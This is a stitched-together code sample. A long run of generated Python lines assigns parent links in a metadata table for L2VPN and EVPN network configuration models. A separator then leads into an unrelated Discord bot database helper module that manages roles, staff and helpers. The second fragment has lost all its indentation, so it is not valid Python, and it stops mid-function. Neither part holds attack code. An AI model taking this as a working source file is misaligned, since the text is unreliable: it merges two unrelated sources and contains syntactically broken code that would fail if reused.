_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns.BdPseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai.DaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces.RoutedInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.NvSatellite']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.IpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Dai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.RoutedInterfaces']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.Sequencing']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.TypeOfService']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.SignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation.PathMtu']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.Sequencing']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.MplsRedundancy']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.PreferredPath']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation.LoadBalanceGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.L2Tpv3Encapsulation']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.BackupDisableDelay']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass.MplsEncapsulation']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses.PseudowireClass']['meta_info'].parent =_meta_table['L2Vpn.Database.PseudowireClasses']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits.VlanUnawareFxcAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns.VlanUnawareFxcPseudowireEvpn']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService.VlanUnawareFxcPseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices.VlanUnawareFlexibleXconnectService']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable.VlanUnawareFlexibleXconnectServices']['meta_info'].parent =_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces.IccpInterface']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup.IccpInterfaces']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups.IccpRedundancyGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups']['meta_info']
_meta_table['L2Vpn.Database.Redundancy.IccpRedundancyGroups']['meta_info'].parent =_meta_table['L2Vpn.Database.Redundancy']['meta_info']
_meta_table['L2Vpn.Database.G8032Rings']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.PseudowireClasses']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.FlexibleXconnectServiceTable']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.Database.Redundancy']['meta_info'].parent =_meta_table['L2Vpn.Database']['meta_info']
_meta_table['L2Vpn.AutoDiscovery.BgpSignaling']['meta_info'].parent =_meta_table['L2Vpn.AutoDiscovery']['meta_info']
_meta_table['L2Vpn.Utility.Logging']['meta_info'].parent =_meta_table['L2Vpn.Utility']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibInterface.Format']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib.MibInterface']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibInterface']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib']['meta_info']
_meta_table['L2Vpn.Snmp.Mib.MibPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Snmp.Mib']['meta_info']
_meta_table['L2Vpn.Snmp.Mib']['meta_info'].parent =_meta_table['L2Vpn.Snmp']['meta_info']
_meta_table['L2Vpn.PwRouting']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Neighbor']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Database']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Pbb']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.AutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Utility']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['L2Vpn.Snmp']['meta_info'].parent =_meta_table['L2Vpn']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface.Interfaces.Interface']['meta_info'].parent =_meta_table['GenericInterfaceLists.GenericInterface.Interfaces']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface.Interfaces']['meta_info'].parent =_meta_table['GenericInterfaceLists.GenericInterface']['meta_info']
_meta_table['GenericInterfaceLists.GenericInterface']['meta_info'].parent =_meta_table['GenericInterfaceLists']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets.EvpnRouteTarget']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteTargets']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EviLoadBalancing']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi.EvpnevibgpAutoDiscovery']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis.Evpnevi']['meta_info'].parent =_meta_table['Evpn.EvpnTables.Evpnevis']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery.EvpnRouteDistinguisher']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving.ServiceList']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.IdentifierType0']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment.ManualServiceCarving']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EvpnacTimers']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface.EthernetSegment']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces.EvpnInterface']['meta_info'].parent =_meta_table['Evpn.EvpnTables.EvpnInterfaces']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnTimers']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.Evpnevis']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnLoadBalancing']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnbgpAutoDiscovery']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables.EvpnInterfaces']['meta_info'].parent =_meta_table['Evpn.EvpnTables']['meta_info']
_meta_table['Evpn.EvpnTables']['meta_info'].parent =_meta_table['Evpn']['meta_info']
|
from . import models
import datetime
from discord import utils, TextChannel
def generate_id():
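    # utils.time_snowflake encodes the given datetime as a Discord snowflake,
    # so IDs generated here sort chronologically (collisions within the same
    # millisecond are possible; see copy_warn below, which bumps by 1 ms).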
return utils.time_snowflake(datetime.datetime.now())
async def add_permanent_role(user_id: int, role_id: int):
await add_dbmember_if_not_exist(user_id)
if not await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
models.PermanentRole.role_id == role_id)).gino.first():
return await models.PermanentRole.create(user_id=user_id, role_id=role_id)
async def remove_permanent_role(user_id: int, role_id: int):
permanent_role = await models.PermanentRole.query.where((models.PermanentRole.user_id == user_id) & (
models.PermanentRole.role_id == role_id)).gino.first()
if permanent_role:
await permanent_role.delete()
return permanent_role
async def get_permanent_roles(user_id: int):
db_member = await get_dbmember(user_id)
if db_member:
return await models.Role.query.where((models.Role.id == models.PermanentRole.role_id) & (models.PermanentRole.user_id == db_member.id)).gino.all()
async def add_staff(user_id: int, position: str):
await add_dbmember_if_not_exist(user_id)
staff = await get_staff(user_id) or await get_helper(user_id)
if staff:
await staff.update(position=position).apply()
else:
await models.Staff.create(id=user_id, position=position)
async def add_helper(user_id: int, position: str, console: str = None):
await add_dbmember_if_not_exist(user_id)
if staff := await get_staff(user_id):
await staff.update(console=console).apply()
else:
